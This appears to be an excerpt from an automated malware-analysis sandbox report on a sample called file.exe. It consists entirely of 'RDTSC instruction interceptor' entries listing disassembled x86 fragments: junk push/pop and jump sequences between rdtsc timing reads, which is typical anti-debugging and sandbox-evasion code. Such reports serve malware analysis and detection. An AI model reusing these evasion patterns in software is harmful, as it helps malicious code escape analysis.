                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44A11 second address: A44A15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48BAD second address: A48BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48BB1 second address: A48BCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F242906E92Fh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48BCA second address: A48BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48BCE second address: A48BEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F242906E933h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4FA5D second address: A4FA62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4FA62 second address: A4FA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52EAC second address: A52EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52857 second address: A5285D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5285D second address: A52863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52AF2 second address: A52AF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52AF6 second address: A52B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2429065B52h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52B0E second address: A52B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52B14 second address: A52B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2429065B55h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52B2D second address: A52B31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A579B6 second address: A579DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2429065B46h 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jp 00007F2429065B46h 0x00000013 jmp 00007F2429065B52h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57B4C second address: A57B50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57B50 second address: A57B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C3E5 second address: A5C3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C3EB second address: A5C402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F2429065B4Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C402 second address: A5C40D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C40D second address: A5C427 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2429065B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F2429065B4Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C427 second address: A5C42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C42D second address: A5C431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C431 second address: A5C435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C584 second address: A5C58C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C58C second address: A5C590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C590 second address: A5C5A8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2429065B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F2429065B46h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C5A8 second address: A5C5AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C5AC second address: A5C5B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C5B0 second address: A5C5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F242906E926h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F242906E92Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C5C4 second address: A5C5C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C5C8 second address: A5C5CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C73A second address: A5C743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5CB2E second address: A5CB3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F242906E926h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5CB3B second address: A5CB41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A045AE second address: A045FD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F242906E928h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D2EBBh], edx 0x00000028 push 00000004h 0x0000002a add dword ptr [ebp+122D1B66h], ebx 0x00000030 nop 0x00000031 jnc 00007F242906E92Ah 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push ebx 0x0000003b jne 00007F242906E926h 0x00000041 pop ebx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A045FD second address: A04603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04603 second address: A04607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6280F second address: A6281B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6281B second address: A6281F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61AF6 second address: A61AFC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61AFC second address: A61B03 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61F0D second address: A61F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6206A second address: A62075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F242906E926h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62075 second address: A6207B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6207B second address: A6207F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62335 second address: A6233C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6233C second address: A62353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F242906E92Eh 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62353 second address: A62359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69475 second address: A69479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69479 second address: A6947F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6947F second address: A6948B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6948B second address: A69491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69491 second address: A69496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69496 second address: A6949C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69A28 second address: A69A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69A2C second address: A69A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69F67 second address: A69F7B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F242906E926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F242906E926h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69F7B second address: A69F92 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2429065B4Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69F92 second address: A69F98 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A31B second address: A6A335 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2429065B56h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A611 second address: A6A616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A905 second address: A6A91F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2429065B56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A91F second address: A6A933 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F242906E92Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007F242906E926h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F5C3 second address: A6F5C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F5C7 second address: A6F5CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F5CB second address: A6F5FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F2429065B59h 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F2429065B46h 0x00000017 jnc 00007F2429065B46h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F5FC second address: A6F639 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F242906E933h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F242906E933h 0x00000010 jmp 00007F242906E931h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F639 second address: A6F64A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2429065B46h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F64A second address: A6F650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72757 second address: A72768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F2429065B4Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72768 second address: A7276C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72A5A second address: A72A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2429065B46h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72A6B second address: A72A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72ED2 second address: A72ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72ED8 second address: A72EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72EDC second address: A72EEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2429065B4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72EEA second address: A72EEF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72EEF second address: A72F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F2429065B5Ch 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jmp 00007F2429065B54h 0x00000018 jnl 00007F2429065B4Ah 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72F20 second address: A72F2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F242906E926h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72F2A second address: A72F2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73062 second address: A730CC instructions: 0x00000000 rdtsc 0x00000002 jc 00007F242906E926h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F242906E92Dh 0x00000011 jmp 00007F242906E92Ah 0x00000016 push ebx 0x00000017 jmp 00007F242906E92Fh 0x0000001c jmp 00007F242906E937h 0x00000021 pop ebx 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push esi 0x00000026 js 00007F242906E926h 0x0000002c jmp 00007F242906E934h 0x00000031 pop esi 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7320C second address: A73212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73212 second address: A7322E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F242906E938h 0x0000000a jmp 00007F242906E930h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C151 second address: A7C171 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2429065B46h 0x00000008 jmp 00007F2429065B56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C171 second address: A7C185 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F242906E92Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C185 second address: A7C18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C18B second address: A7C18F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C18F second address: A7C1B1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2429065B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jg 00007F2429065B46h 0x00000011 pop edi 0x00000012 push eax 0x00000013 jno 00007F2429065B46h 0x00000019 push edx 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C1B1 second address: A7C1B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7A8B9 second address: A7A8BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7A8BD second address: A7A8C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7A8C3 second address: A7A8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7A8C9 second address: A7A8CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7A8CF second address: A7A8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F2429065B46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7A8D9 second address: A7A8DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B16D second address: A7B172 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BF6A second address: A7BF88 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F242906E926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F242906E92Dh 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BF88 second address: A7BF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BF92 second address: A7BF98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A79EE8 second address: A79EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7F569 second address: A7F573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F242906E926h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCEED second address: 9BCEFB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2429065B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80C2A second address: A80C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A85595 second address: A8559D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8559D second address: A855A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A855A3 second address: A855A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
